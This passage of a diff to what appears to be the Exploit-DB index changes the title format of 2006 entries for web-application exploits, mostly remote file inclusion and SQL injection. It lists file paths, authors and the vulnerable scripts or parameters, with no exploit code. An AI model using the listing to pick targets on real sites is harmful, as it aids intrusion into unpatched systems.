2706,platforms/php/webapps/2706.txt,"MODx CMS 0.9.2.1 - 'FCKeditor' Remote File Inclusion",2006-11-03,nuffsaid,php,webapps,0 2707,platforms/php/webapps/2707.php,"PostNuke 0.763 - (PNSV lang) Remote Code Execution",2006-11-03,Kacper,php,webapps,0 @@ -16936,7 +16939,7 @@ id,file,description,date,author,platform,type,port 2718,platforms/php/webapps/2718.txt,"SazCart 1.5 - 'cart.php' Remote File Inclusion",2006-11-04,IbnuSina,php,webapps,0 2719,platforms/php/webapps/2719.php,"Quick.CMS.Lite 0.3 - (Cookie sLanguage) Local File Inclusion",2006-11-05,Kacper,php,webapps,0 2720,platforms/php/webapps/2720.pl,"PHP Classifieds 7.1 - 'detail.php' SQL Injection",2006-11-05,ajann,php,webapps,0 -2721,platforms/php/webapps/2721.php,"Ultimate PHP Board 2.0 - (header_simple.php) File Inclusion",2006-11-05,Kacper,php,webapps,0 +2721,platforms/php/webapps/2721.php,"Ultimate PHP Board 2.0 - 'header_simple.php' File Inclusion",2006-11-05,Kacper,php,webapps,0 2722,platforms/php/webapps/2722.pl,"Webdrivers Simple Forum - 'message_details.php' SQL Injection",2006-11-05,Bl0od3r,php,webapps,0 2724,platforms/php/webapps/2724.txt,"Soholaunch Pro 4.9 r36 - Remote File Inclusion",2006-11-06,the_day,php,webapps,0 2725,platforms/php/webapps/2725.txt,"Cyberfolio 2.0 RC1 - 'av' Parameter Remote File Inclusion",2006-11-06,the_day,php,webapps,0 @@ -16945,65 +16948,65 @@ id,file,description,date,author,platform,type,port 2728,platforms/php/webapps/2728.txt,"Article Script 1.6.3 - 'rss.php' SQL Injection (1)",2006-11-06,Liz0ziM,php,webapps,0 2731,platforms/php/webapps/2731.pl,"iPrimal Forums - 'admin/index.php' Change User Password Exploit",2006-11-06,Bl0od3r,php,webapps,0 2732,platforms/php/webapps/2732.txt,"PHPGiggle 12.08 - (CFG_PHPGIGGLE_ROOT) File Inclusion",2006-11-06,ajann,php,webapps,0 -2733,platforms/php/webapps/2733.txt,"iWare Pro 5.0.4 - (chat_panel.php) Remote Code Execution",2006-11-07,nuffsaid,php,webapps,0 -2736,platforms/php/webapps/2736.txt,"PHPAdventure 1.1 - (ad_main.php) Remote File Inclusion",2006-11-07,HER0,php,webapps,0 +2733,platforms/php/webapps/2733.txt,"iWare Pro 5.0.4 - 'chat_panel.php' Remote Code Execution",2006-11-07,nuffsaid,php,webapps,0 +2736,platforms/php/webapps/2736.txt,"PHPAdventure 1.1 - 'ad_main.php' Remote File Inclusion",2006-11-07,HER0,php,webapps,0 2739,platforms/php/webapps/2739.txt,"iPrimal Forums - 'admin/index.php' Remote File Inclusion",2006-11-08,Bl0od3r,php,webapps,0 2740,platforms/php/webapps/2740.txt,"vBlog / C12 0.1 - (cfgProgDir) Remote File Inclusion",2006-11-08,DeltahackingTEAM,php,webapps,0 -2741,platforms/php/webapps/2741.txt,"IrayoBlog 0.2.4 - (inc/irayofuncs.php) Remote File Inclusion",2006-11-08,DeltahackingTEAM,php,webapps,0 +2741,platforms/php/webapps/2741.txt,"IrayoBlog 0.2.4 - 'inc/irayofuncs.php' Remote File Inclusion",2006-11-08,DeltahackingTEAM,php,webapps,0 2742,platforms/php/webapps/2742.txt,"DodosMail 2.0.1 - 'dodosmail.php' Remote File Inclusion",2006-11-08,"Cold Zero",php,webapps,0 2744,platforms/php/webapps/2744.txt,"LetterIt 2.0 - 'session.php' Remote File Inclusion",2006-11-09,v1per-haCker,php,webapps,0 2745,platforms/php/webapps/2745.txt,"gtcatalog 0.9.1 - 'index.php' Remote File Inclusion",2006-11-09,v1per-haCker,php,webapps,0 -2746,platforms/asp/webapps/2746.pl,"AspPired2Poll 1.0 - (MoreInfo.asp) SQL Injection",2006-11-09,ajann,asp,webapps,0 -2747,platforms/php/webapps/2747.txt,"MyAlbum 3.02 - (language.inc.php) Remote File Inclusion",2006-11-09,"Silahsiz Kuvvetler",php,webapps,0 -2748,platforms/php/webapps/2748.pl,"PHPManta 1.0.2 - (view-sourcecode.php) Local File Inclusion",2006-11-09,ajann,php,webapps,0 -2750,platforms/php/webapps/2750.txt,"EncapsCMS 0.3.6 - (core/core.php) Remote File Inclusion",2006-11-10,Firewall,php,webapps,0 +2746,platforms/asp/webapps/2746.pl,"AspPired2Poll 1.0 - 'MoreInfo.asp' SQL Injection",2006-11-09,ajann,asp,webapps,0 +2747,platforms/php/webapps/2747.txt,"MyAlbum 3.02 - 'language.inc.php' Remote File Inclusion",2006-11-09,"Silahsiz Kuvvetler",php,webapps,0 +2748,platforms/php/webapps/2748.pl,"PHPManta 1.0.2 - 'view-sourcecode.php' Local File Inclusion",2006-11-09,ajann,php,webapps,0 +2750,platforms/php/webapps/2750.txt,"EncapsCMS 0.3.6 - 'core/core.php' Remote File Inclusion",2006-11-10,Firewall,php,webapps,0 2751,platforms/php/webapps/2751.txt,"BrewBlogger 1.3.1 - 'printLog.php' SQL Injection",2006-11-10,"Craig Heffner",php,webapps,0 2752,platforms/php/webapps/2752.txt,"WORK System E-Commerce 3.0.1 - Remote File Inclusion",2006-11-10,SlimTim10,php,webapps,0 -2754,platforms/asp/webapps/2754.pl,"NuCommunity 1.0 - (cl_CatListing.asp) SQL Injection",2006-11-11,ajann,asp,webapps,0 -2755,platforms/asp/webapps/2755.pl,"NuRems 1.0 - (propertysdetails.asp) SQL Injection",2006-11-11,ajann,asp,webapps,0 -2756,platforms/asp/webapps/2756.txt,"NuStore 1.0 - (Products.asp) SQL Injection",2006-11-11,ajann,asp,webapps,0 -2757,platforms/asp/webapps/2757.pl,"NuSchool 1.0 - (CampusNewsDetails.asp) SQL Injection",2006-11-11,ajann,asp,webapps,0 +2754,platforms/asp/webapps/2754.pl,"NuCommunity 1.0 - 'cl_CatListing.asp' SQL Injection",2006-11-11,ajann,asp,webapps,0 +2755,platforms/asp/webapps/2755.pl,"NuRems 1.0 - 'propertysdetails.asp' SQL Injection",2006-11-11,ajann,asp,webapps,0 +2756,platforms/asp/webapps/2756.txt,"NuStore 1.0 - 'Products.asp' SQL Injection",2006-11-11,ajann,asp,webapps,0 +2757,platforms/asp/webapps/2757.pl,"NuSchool 1.0 - 'CampusNewsDetails.asp' SQL Injection",2006-11-11,ajann,asp,webapps,0 2758,platforms/php/webapps/2758.php,"PHPWCMS 1.2.6 - (Cookie: wcs_user_lang) Local File Inclusion",2006-11-11,Kacper,php,webapps,0 2759,platforms/php/webapps/2759.php,"PHPWind 5.0.1 - (AdminUser) Blind SQL Injection",2006-11-12,rgod,php,webapps,0 2760,platforms/php/webapps/2760.php,"Rama CMS 0.68 - (Cookie: lang) Local File Inclusion",2006-11-12,Kacper,php,webapps,0 -2761,platforms/asp/webapps/2761.pl,"Munch Pro 1.0 - (switch.asp) SQL Injection",2006-11-12,ajann,asp,webapps,0 +2761,platforms/asp/webapps/2761.pl,"Munch Pro 1.0 - 'switch.asp' SQL Injection",2006-11-12,ajann,asp,webapps,0 2762,platforms/asp/webapps/2762.asp,"ASPPortal 4.0.0 - 'default1.asp' SQL Injection",2006-11-12,ajann,asp,webapps,0 -2763,platforms/asp/webapps/2763.txt,"UStore 1.0 - (detail.asp) SQL Injection",2006-11-12,ajann,asp,webapps,0 -2764,platforms/asp/webapps/2764.txt,"USupport 1.0 - (detail.asp) SQL Injection",2006-11-12,ajann,asp,webapps,0 -2765,platforms/asp/webapps/2765.txt,"UPublisher 1.0 - (viewarticle.asp) SQL Injection",2006-11-12,ajann,asp,webapps,0 +2763,platforms/asp/webapps/2763.txt,"UStore 1.0 - 'detail.asp' SQL Injection",2006-11-12,ajann,asp,webapps,0 +2764,platforms/asp/webapps/2764.txt,"USupport 1.0 - 'detail.asp' SQL Injection",2006-11-12,ajann,asp,webapps,0 +2765,platforms/asp/webapps/2765.txt,"UPublisher 1.0 - 'viewarticle.asp' SQL Injection",2006-11-12,ajann,asp,webapps,0 2766,platforms/php/webapps/2766.pl,"CMSmelborp Beta - 'user_standard.php' Remote File Inclusion",2006-11-12,DeltahackingTEAM,php,webapps,0 2767,platforms/php/webapps/2767.txt,"StoryStream 4.0 - 'baseDir' Remote File Inclusion",2006-11-12,v1per-haCker,php,webapps,0 2768,platforms/php/webapps/2768.txt,"ContentNow 1.30 - Local File Inclusion / Arbitrary File Upload/Delete",2006-11-13,r0ut3r,php,webapps,0 -2769,platforms/php/webapps/2769.php,"Quick.Cart 2.0 - (actions_client/gallery.php) Local File Inclusion",2006-11-13,Kacper,php,webapps,0 -2772,platforms/asp/webapps/2772.htm,"Online Event Registration 2.0 - (save_profile.asp) Pass Change Exploit",2006-11-13,ajann,asp,webapps,0 +2769,platforms/php/webapps/2769.php,"Quick.Cart 2.0 - 'actions_client/gallery.php' Local File Inclusion",2006-11-13,Kacper,php,webapps,0 +2772,platforms/asp/webapps/2772.htm,"Online Event Registration 2.0 - 'save_profile.asp' Pass Change Exploit",2006-11-13,ajann,asp,webapps,0 2773,platforms/asp/webapps/2773.txt,"Estate Agent Manager 1.3 - 'default.asp' Login Bypass",2006-11-13,ajann,asp,webapps,0 -2774,platforms/asp/webapps/2774.txt,"Property Pro 1.0 - (vir_Login.asp) Remote Login Bypass",2006-11-13,ajann,asp,webapps,0 +2774,platforms/asp/webapps/2774.txt,"Property Pro 1.0 - 'vir_Login.asp' Remote Login Bypass",2006-11-13,ajann,asp,webapps,0 2775,platforms/php/webapps/2775.txt,"Phpjobscheduler 3.0 - (installed_config_file) File Inclusion",2006-11-13,Firewall,php,webapps,0 2776,platforms/php/webapps/2776.txt,"ContentNow 1.30 - Arbitrary File Upload / Cross-Site Scripting",2006-11-14,Timq,php,webapps,0 2777,platforms/php/webapps/2777.txt,"Aigaion 1.2.1 - (DIR) Remote File Inclusion",2006-11-14,navairum,php,webapps,0 -2778,platforms/php/webapps/2778.txt,"PHPPeanuts 1.3 Beta - (Inspect.php) Remote File Inclusion",2006-11-14,"Hidayat Sagita",php,webapps,0 +2778,platforms/php/webapps/2778.txt,"PHPPeanuts 1.3 Beta - 'Inspect.php' Remote File Inclusion",2006-11-14,"Hidayat Sagita",php,webapps,0 2779,platforms/asp/webapps/2779.txt,"ASP Smiley 1.0 - 'default.asp' Login Bypass (SQL Injection)",2006-11-14,ajann,asp,webapps,0 -2780,platforms/asp/webapps/2780.txt,"NetVIOS 2.0 - (page.asp) SQL Injection",2006-11-14,ajann,asp,webapps,0 +2780,platforms/asp/webapps/2780.txt,"NetVIOS 2.0 - 'page.asp' SQL Injection",2006-11-14,ajann,asp,webapps,0 2781,platforms/asp/webapps/2781.txt,"blogme 3.0 - Cross-Site Scripting / Authentication Bypass",2006-11-14,"Security Access Point",asp,webapps,0 2782,platforms/asp/webapps/2782.txt,"Hpecs Shopping Cart - Remote Login Bypass",2006-11-14,"Security Access Point",asp,webapps,0 2786,platforms/php/webapps/2786.txt,"torrentflux 2.2 - Arbitrary File Create/ Execute/Delete",2006-11-15,r0ut3r,php,webapps,0 -2790,platforms/php/webapps/2790.pl,"Etomite CMS 0.6.1.2 - (manager/index.php) Local File Inclusion",2006-11-16,Revenge,php,webapps,0 +2790,platforms/php/webapps/2790.pl,"Etomite CMS 0.6.1.2 - 'manager/index.php' Local File Inclusion",2006-11-16,Revenge,php,webapps,0 2791,platforms/php/webapps/2791.txt,"HTTP Upload Tool - 'download.php' Information Disclosure",2006-11-16,"Craig Heffner",php,webapps,0 2794,platforms/php/webapps/2794.txt,"mg.applanix 1.3.1 - (apx_root_path) Remote File Inclusion",2006-11-17,v1per-haCker,php,webapps,0 2795,platforms/php/webapps/2795.txt,"DoSePa 1.0.4 - 'textview.php' Information Disclosure",2006-11-17,"Craig Heffner",php,webapps,0 -2796,platforms/php/webapps/2796.php,"miniCWB 1.0.0 - (contact.php) Local File Inclusion",2006-11-17,Kacper,php,webapps,0 +2796,platforms/php/webapps/2796.php,"miniCWB 1.0.0 - 'contact.php' Local File Inclusion",2006-11-17,Kacper,php,webapps,0 2797,platforms/php/webapps/2797.txt,"Powies pForum 1.29a - 'editpoll.php' SQL Injection",2006-11-17,SHiKaA,php,webapps,0 -2798,platforms/php/webapps/2798.txt,"Powies MatchMaker 4.05 - (matchdetail.php) SQL Injection",2006-11-17,SHiKaA,php,webapps,0 -2799,platforms/php/webapps/2799.txt,"mxBB Module calsnails 1.06 - (mx_common.php) File Inclusion",2006-11-17,bd0rk,php,webapps,0 +2798,platforms/php/webapps/2798.txt,"Powies MatchMaker 4.05 - 'matchdetail.php' SQL Injection",2006-11-17,SHiKaA,php,webapps,0 +2799,platforms/php/webapps/2799.txt,"mxBB Module calsnails 1.06 - 'mx_common.php' File Inclusion",2006-11-17,bd0rk,php,webapps,0 2807,platforms/php/webapps/2807.pl,"Joomla! Component MosReporter 0.9.3 - Remote File Inclusion",2006-11-17,Crackers_Child,php,webapps,0 -2808,platforms/php/webapps/2808.txt,"Dicshunary 0.1a - (check_status.php) Remote File Inclusion",2006-11-17,DeltahackingTEAM,php,webapps,0 +2808,platforms/php/webapps/2808.txt,"Dicshunary 0.1a - 'check_status.php' Remote File Inclusion",2006-11-17,DeltahackingTEAM,php,webapps,0 2810,platforms/php/webapps/2810.php,"Oxygen 1.1.3 (O2PHP Bulletin Board) - SQL Injection",2006-11-18,DarkFig,php,webapps,0 -2811,platforms/php/webapps/2811.txt,"PHPWebThings 1.5.2 - (editor.php) Remote File Inclusion",2006-11-18,nuffsaid,php,webapps,0 +2811,platforms/php/webapps/2811.txt,"PHPWebThings 1.5.2 - 'editor.php' Remote File Inclusion",2006-11-18,nuffsaid,php,webapps,0 2812,platforms/php/webapps/2812.pl,"PHP Easy Downloader 1.5 - 'save.php' Remote Code Execution",2006-11-18,nuffsaid,php,webapps,0 -2813,platforms/asp/webapps/2813.txt,"ASPNuke 0.80 - (register.asp) SQL Injection",2006-11-19,ajann,asp,webapps,0 +2813,platforms/asp/webapps/2813.txt,"ASPNuke 0.80 - 'register.asp' SQL Injection",2006-11-19,ajann,asp,webapps,0 2814,platforms/php/webapps/2814.txt,"PHPQuickGallery 1.9 - (textFile) Remote File Inclusion",2006-11-19,"Al7ejaz Hacker",php,webapps,0 -2817,platforms/php/webapps/2817.txt,"Photo Cart 3.9 - (adminprint.php) Remote File Inclusion",2006-11-21,irvian,php,webapps,0 -2818,platforms/php/webapps/2818.txt,"e-Ark 1.0 - (src/ark_inc.php) Remote File Inclusion",2006-11-21,DeltahackingTEAM,php,webapps,0 +2817,platforms/php/webapps/2817.txt,"Photo Cart 3.9 - 'adminprint.php' Remote File Inclusion",2006-11-21,irvian,php,webapps,0 +2818,platforms/php/webapps/2818.txt,"e-Ark 1.0 - 'src/ark_inc.php' Remote File Inclusion",2006-11-21,DeltahackingTEAM,php,webapps,0 2819,platforms/php/webapps/2819.txt,"LDU 8.x - (avatarselect id) SQL Injection",2006-11-21,nukedx,php,webapps,0 2820,platforms/php/webapps/2820.txt,"Seditio 1.10 - (avatarselect id) SQL Injection",2006-11-21,nukedx,php,webapps,0 2822,platforms/php/webapps/2822.pl,"ContentNow 1.39 - 'pageid' Parameter SQL Injection",2006-11-21,Revenge,php,webapps,0 @@ -17011,16 +17014,16 @@ id,file,description,date,author,platform,type,port 2826,platforms/php/webapps/2826.txt,"Pearl Forums 2.4 - Multiple Remote File Inclusion",2006-11-21,3l3ctric-Cracker,php,webapps,0 2827,platforms/php/webapps/2827.txt,"phpPC 1.04 - Multiple Remote File Inclusion",2006-11-21,iss4m,php,webapps,0 2828,platforms/asp/webapps/2828.pl,"FipsCMS 4.5 - 'index.asp' SQL Injection",2006-11-22,ajann,asp,webapps,0 -2829,platforms/asp/webapps/2829.txt,"fipsGallery 1.5 - (index1.asp) SQL Injection",2006-11-22,ajann,asp,webapps,0 -2830,platforms/asp/webapps/2830.txt,"fipsForum 2.6 - (default2.asp) SQL Injection",2006-11-22,ajann,asp,webapps,0 +2829,platforms/asp/webapps/2829.txt,"fipsGallery 1.5 - 'index1.asp' SQL Injection",2006-11-22,ajann,asp,webapps,0 +2830,platforms/asp/webapps/2830.txt,"fipsForum 2.6 - 'default2.asp' SQL Injection",2006-11-22,ajann,asp,webapps,0 2831,platforms/php/webapps/2831.txt,"a-ConMan 3.2b - 'common.inc.php' Remote File Inclusion",2006-11-22,Matdhule,php,webapps,0 2832,platforms/php/webapps/2832.txt,"Messagerie Locale - 'centre.php' Remote File Inclusion",2006-11-23,DaDIsS,php,webapps,0 2833,platforms/php/webapps/2833.txt,"Site News - 'centre.php' Remote File Inclusion",2006-11-23,DaDIsS,php,webapps,0 2834,platforms/php/webapps/2834.txt,"Recipes Complete Website 1.1.14 - SQL Injection",2006-11-23,GregStar,php,webapps,0 2835,platforms/php/webapps/2835.txt,"Wallpaper Complete Website 1.0.09 - SQL Injection",2006-11-23,GregStar,php,webapps,0 -2836,platforms/php/webapps/2836.txt,"JiRos FAQ Manager 1.0 - (index.asp) SQL Injection",2006-11-23,ajann,php,webapps,0 -2838,platforms/php/webapps/2838.txt,"HSRS 1.0 - (addcode.php) Remote File Inclusion",2006-11-23,"Cold Zero",php,webapps,0 -2839,platforms/php/webapps/2839.txt,"OWLLib 1.0 - (OWLMemoryProperty.php) Remote File Inclusion",2006-11-23,DeltahackingTEAM,php,webapps,0 +2836,platforms/php/webapps/2836.txt,"JiRos FAQ Manager 1.0 - 'index.asp' SQL Injection",2006-11-23,ajann,php,webapps,0 +2838,platforms/php/webapps/2838.txt,"HSRS 1.0 - 'addcode.php' Remote File Inclusion",2006-11-23,"Cold Zero",php,webapps,0 +2839,platforms/php/webapps/2839.txt,"OWLLib 1.0 - 'OWLMemoryProperty.php' Remote File Inclusion",2006-11-23,DeltahackingTEAM,php,webapps,0 2840,platforms/php/webapps/2840.txt,"PEGames - 'index.php' Remote File Inclusion",2006-11-23,DeltahackingTEAM,php,webapps,0 2841,platforms/php/webapps/2841.php,"Woltlab Burning Board Lite 1.0.2 - decode_cookie() SQL Injection",2006-11-24,rgod,php,webapps,0 2842,platforms/php/webapps/2842.php,"Woltlab Burning Board Lite 1.0.2 - Blind SQL Injection",2006-11-23,rgod,php,webapps,0 @@ -17028,161 +17031,161 @@ id,file,description,date,author,platform,type,port 2844,platforms/php/webapps/2844.pl,"Cahier de texte 2.0 - (Database Backup/Source Disclosure) Remote Exploit",2006-11-24,DarkFig,php,webapps,0 2846,platforms/asp/webapps/2846.txt,"Liberum Help Desk 0.97.3 - SQL Injection",2006-11-25,ajann,asp,webapps,0 2847,platforms/php/webapps/2847.txt,"Sisfo Kampus 0.8 - Remote File Inclusion / Download",2006-11-25,"Wawan Firmansyah",php,webapps,0 -2848,platforms/asp/webapps/2848.txt,"Basic Forum 1.1 - (edit.asp) SQL Injection",2006-11-25,bolivar,asp,webapps,0 +2848,platforms/asp/webapps/2848.txt,"Basic Forum 1.1 - 'edit.asp' SQL Injection",2006-11-25,bolivar,asp,webapps,0 2849,platforms/asp/webapps/2849.txt,"ASP-Nuke Community 1.5 - Cookie Privilege Escalation",2006-11-25,ajann,asp,webapps,0 -2850,platforms/php/webapps/2850.txt,"Exhibit Engine 1.22 - (styles.php) Remote File Inclusion",2006-11-25,Kacper,php,webapps,0 +2850,platforms/php/webapps/2850.txt,"Exhibit Engine 1.22 - 'styles.php' Remote File Inclusion",2006-11-25,Kacper,php,webapps,0 2851,platforms/php/webapps/2851.txt,"Hacks List phpBB Mod 1.21 - SQL Injection",2006-11-26,"the master",php,webapps,0 2852,platforms/php/webapps/2852.txt,"Mambo Component com_flyspray <= 1.0.1 - Remote File Disclosure",2006-11-26,3l3ctric-Cracker,php,webapps,0 -2853,platforms/asp/webapps/2853.txt,"SimpleBlog 2.3 - (admin/edit.asp) SQL Injection",2006-11-26,bolivar,asp,webapps,0 +2853,platforms/asp/webapps/2853.txt,"SimpleBlog 2.3 - 'admin/edit.asp' SQL Injection",2006-11-26,bolivar,asp,webapps,0 2859,platforms/php/webapps/2859.php,"Discuz! 4.x - SQL Injection / Admin Credentials Disclosure",2006-11-28,rgod,php,webapps,0 -2862,platforms/php/webapps/2862.txt,"P-News 2.0 - (user.txt) Remote Password Disclosure",2006-11-28,Lu7k,php,webapps,0 +2862,platforms/php/webapps/2862.txt,"P-News 2.0 - 'user.txt' Remote Password Disclosure",2006-11-28,Lu7k,php,webapps,0 2863,platforms/php/webapps/2863.php,"kubix 0.7 - Multiple Vulnerabilities",2006-11-29,BlackHawk,php,webapps,0 -2864,platforms/php/webapps/2864.txt,"b2evolution 1.8.5 < 1.9b - (import-mt.php) Remote File Inclusion",2006-11-29,tarkus,php,webapps,0 +2864,platforms/php/webapps/2864.txt,"b2evolution 1.8.5 < 1.9b - 'import-mt.php' Remote File Inclusion",2006-11-29,tarkus,php,webapps,0 2867,platforms/php/webapps/2867.php,"phpGraphy 0.9.12 - Privilege Escalation / Commands Execution Exploit",2006-11-30,rgod,php,webapps,0 2869,platforms/php/webapps/2869.php,"S9Y Serendipity 1.0.3 - 'comment.php' Local File Inclusion",2006-11-30,Kacper,php,webapps,0 -2871,platforms/php/webapps/2871.txt,"LDU 8.x - (polls.php) SQL Injection",2006-11-30,ajann,php,webapps,0 +2871,platforms/php/webapps/2871.txt,"LDU 8.x - 'polls.php' SQL Injection",2006-11-30,ajann,php,webapps,0 2876,platforms/php/webapps/2876.txt,"DZCP (deV!L_z Clanportal) 1.3.6 - Arbitrary File Upload",2006-12-01,"Tim Weber",php,webapps,0 2877,platforms/php/webapps/2877.txt,"Invision Community Blog Mod 1.2.4 - SQL Injection",2006-12-01,anonymous,php,webapps,0 -2878,platforms/php/webapps/2878.txt,"ContentServ 4.x - (admin/FileServer.php) File Disclosure",2006-12-01,qobaiashi,php,webapps,0 +2878,platforms/php/webapps/2878.txt,"ContentServ 4.x - 'admin/FileServer.php' File Disclosure",2006-12-01,qobaiashi,php,webapps,0 2881,platforms/asp/webapps/2881.txt,"Ultimate HelpDesk - Cross-Site Scripting / Local File Disclosure",2006-12-01,ajann,asp,webapps,0 2882,platforms/php/webapps/2882.txt,"BBS E-Market Professional - Full Path Disclosure / File Inclusion",2006-12-02,y3dips,php,webapps,0 2883,platforms/php/webapps/2883.txt,"simple file manager 0.24a - Multiple Vulnerabilities",2006-12-02,flame,php,webapps,0 2884,platforms/php/webapps/2884.txt,"awrate.com Message Board 1.0 - 'search.php' Remote File Inclusion",2006-12-02,DeltahackingTEAM,php,webapps,0 2885,platforms/php/webapps/2885.txt,"mxBB Module mx_tinies 1.3.0 - Remote File Inclusion",2006-12-02,bd0rk,php,webapps,0 -2886,platforms/php/webapps/2886.txt,"PHP Upload Center 2.0 - (activate.php) File Inclusion",2006-12-03,GregStar,php,webapps,0 +2886,platforms/php/webapps/2886.txt,"PHP Upload Center 2.0 - 'activate.php' File Inclusion",2006-12-03,GregStar,php,webapps,0 2888,platforms/php/webapps/2888.php,"Envolution 1.1.0 - (PNSVlang) Remote Code Execution",2006-12-03,Kacper,php,webapps,0 -2889,platforms/php/webapps/2889.pl,"QuickCart 2.0 - (categories.php) Local File Inclusion",2006-12-03,r0ut3r,php,webapps,0 +2889,platforms/php/webapps/2889.pl,"QuickCart 2.0 - 'categories.php' Local File Inclusion",2006-12-03,r0ut3r,php,webapps,0 2890,platforms/php/webapps/2890.txt,"PHP-revista 1.1.2 - (adodb) Multiple Remote File Inclusion",2006-12-03,"Cold Zero",php,webapps,0 2891,platforms/php/webapps/2891.txt,"CuteNews aj-fork 167f - 'cutepath' Parameter Remote File Inclusion",2006-12-04,DeltahackingTEAM,php,webapps,0 2894,platforms/php/webapps/2894.txt,"Phorum 3.2.11 - 'common.php' Remote File Inclusion",2006-12-06,Mr-m07,php,webapps,0 2895,platforms/php/webapps/2895.pl,"J-OWAMP Web Interface 2.1b - (link) Remote File Inclusion",2006-12-07,3l3ctric-Cracker,php,webapps,0 2896,platforms/php/webapps/2896.txt,"Tucows Client Code Suite (CSS) 1.2.1015 - File Inclusion",2006-12-08,3l3ctric-Cracker,php,webapps,0 2897,platforms/php/webapps/2897.txt,"CM68 News 12.02.06 - (addpth) Remote File Inclusion",2006-12-08,"Paul Bakoyiannis",php,webapps,0 -2898,platforms/php/webapps/2898.txt,"ThinkEdit 1.9.2 - (render.php) Remote File Inclusion",2006-12-08,r0ut3r,php,webapps,0 +2898,platforms/php/webapps/2898.txt,"ThinkEdit 1.9.2 - 'render.php' Remote File Inclusion",2006-12-08,r0ut3r,php,webapps,0 2899,platforms/php/webapps/2899.txt,"paFileDB 3.5.2/3.5.3 - Remote Login Bypass (SQL Injection)",2006-12-08,koray,php,webapps,0 -2902,platforms/php/webapps/2902.pl,"TorrentFlux 2.2 - (downloaddetails.php) Local File Disclosure",2006-12-09,r0ut3r,php,webapps,0 -2903,platforms/php/webapps/2903.pl,"TorrentFlux 2.2 - (maketorrent.php) Remote Command Execution",2006-12-09,r0ut3r,php,webapps,0 +2902,platforms/php/webapps/2902.pl,"TorrentFlux 2.2 - 'downloaddetails.php' Local File Disclosure",2006-12-09,r0ut3r,php,webapps,0 +2903,platforms/php/webapps/2903.pl,"TorrentFlux 2.2 - 'maketorrent.php' Remote Command Execution",2006-12-09,r0ut3r,php,webapps,0 2904,platforms/php/webapps/2904.txt,"mxBB Module Profile CP 0.91c - Remote File Inclusion",2006-12-09,bd0rk,php,webapps,0 2905,platforms/php/webapps/2905.txt,"Gizzar 03162002 - 'index.php' Remote File Inclusion",2006-12-09,DeltahackingTEAM,php,webapps,0 2906,platforms/php/webapps/2906.pl,"Fantastic News 2.1.4 - 'news.php' SQL Injection",2006-12-09,Bl0od3r,php,webapps,0 2907,platforms/asp/webapps/2907.txt,"SpotLight CRM 1.0 - 'login.asp' SQL Injection",2006-12-09,ajann,asp,webapps,0 2908,platforms/asp/webapps/2908.txt,"Request For Travel 1.0 - (product) SQL Injection",2006-12-09,ajann,asp,webapps,0 -2909,platforms/asp/webapps/2909.txt,"HR Assist 1.05 - (vdateUsr.asp) Remote Login Bypass",2006-12-09,ajann,asp,webapps,0 -2913,platforms/php/webapps/2913.php,"PHPAlbum 0.4.1 Beta 6 - (language.php) Local File Inclusion",2006-12-10,Kacper,php,webapps,0 +2909,platforms/asp/webapps/2909.txt,"HR Assist 1.05 - 'vdateUsr.asp' Remote Login Bypass",2006-12-09,ajann,asp,webapps,0 +2913,platforms/php/webapps/2913.php,"PHPAlbum 0.4.1 Beta 6 - 'language.php' Local File Inclusion",2006-12-10,Kacper,php,webapps,0 2917,platforms/php/webapps/2917.txt,"mxBB Module ErrorDocs 1.0 - 'common.php' Remote File Inclusion",2006-12-11,bd0rk,php,webapps,0 2919,platforms/php/webapps/2919.pl,"mxBB Module Activity Games 0.92 - Remote File Inclusion",2006-12-11,3l3ctric-Cracker,php,webapps,0 -2920,platforms/php/webapps/2920.txt,"Barman 0.0.1r3 - (Interface.php) Remote File Inclusion",2006-12-11,DeltahackingTEAM,php,webapps,0 +2920,platforms/php/webapps/2920.txt,"Barman 0.0.1r3 - 'Interface.php' Remote File Inclusion",2006-12-11,DeltahackingTEAM,php,webapps,0 2921,platforms/php/webapps/2921.txt,"mxBB Module mx_modsdb 1.0 - Remote File Inclusion",2006-12-12,Lu7k,php,webapps,0 -2923,platforms/php/webapps/2923.txt,"Blog:CMS 4.1.3 - (NP_UserSharing.php) Remote File Inclusion",2006-12-12,"HACKERS PAL",php,webapps,0 +2923,platforms/php/webapps/2923.txt,"Blog:CMS 4.1.3 - 'NP_UserSharing.php' Remote File Inclusion",2006-12-12,"HACKERS PAL",php,webapps,0 2924,platforms/php/webapps/2924.txt,"mxBB Module kb_mods 2.0.2 - Remote File Inclusion",2006-12-12,3l3ctric-Cracker,php,webapps,0 2925,platforms/php/webapps/2925.pl,"mxBB Module newssuite 1.03 - Remote File Inclusion",2006-12-12,3l3ctric-Cracker,php,webapps,0 -2927,platforms/php/webapps/2927.txt,"PHPMyCMS 0.3 - (basic.inc.php) Remote File Inclusion",2006-12-13,v1per-haCker,php,webapps,0 -2930,platforms/php/webapps/2930.pl,"yaplap 0.6.1b - (ldap.php) Remote File Inclusion",2006-12-14,DeltahackingTEAM,php,webapps,0 +2927,platforms/php/webapps/2927.txt,"PHPMyCMS 0.3 - 'basic.inc.php' Remote File Inclusion",2006-12-13,v1per-haCker,php,webapps,0 +2930,platforms/php/webapps/2930.pl,"yaplap 0.6.1b - 'ldap.php' Remote File Inclusion",2006-12-14,DeltahackingTEAM,php,webapps,0 2931,platforms/php/webapps/2931.txt,"AR Memberscript - 'usercp_menu.php' Remote File Inclusion",2006-12-14,ex0,php,webapps,0 2937,platforms/php/webapps/2937.php,"extreme-fusion 4.02 - Remote Code Execution",2006-12-16,Kacper,php,webapps,0 2938,platforms/php/webapps/2938.htm,"Bandwebsite 1.5 - 'LOGIN' Remote Add Admin",2006-12-16,H0tTurk-,php,webapps,0 2939,platforms/php/webapps/2939.txt,"mxBB Module WebLinks 2.05 - Remote File Inclusion",2006-12-16,ajann,php,webapps,0 2940,platforms/php/webapps/2940.txt,"mxbb module charts 1.0.0 - Remote File Inclusion",2006-12-16,ajann,php,webapps,0 2941,platforms/php/webapps/2941.txt,"mxBB Module Meeting 1.1.2 - Remote FileInclusion",2006-12-16,ajann,php,webapps,0 -2943,platforms/php/webapps/2943.txt,"Azucar CMS 1.3 - (admin/index_sitios.php) File Inclusion",2006-12-18,nuffsaid,php,webapps,0 +2943,platforms/php/webapps/2943.txt,"Azucar CMS 1.3 - 'admin/index_sitios.php' File Inclusion",2006-12-18,nuffsaid,php,webapps,0 2944,platforms/php/webapps/2944.txt,"VerliAdmin 0.3 - 'index.php' Remote File Inclusion",2006-12-18,Kacper,php,webapps,0 2945,platforms/php/webapps/2945.txt,"Uploader & Downloader 3.0 - (id_user) SQL Injection",2006-12-18,"the 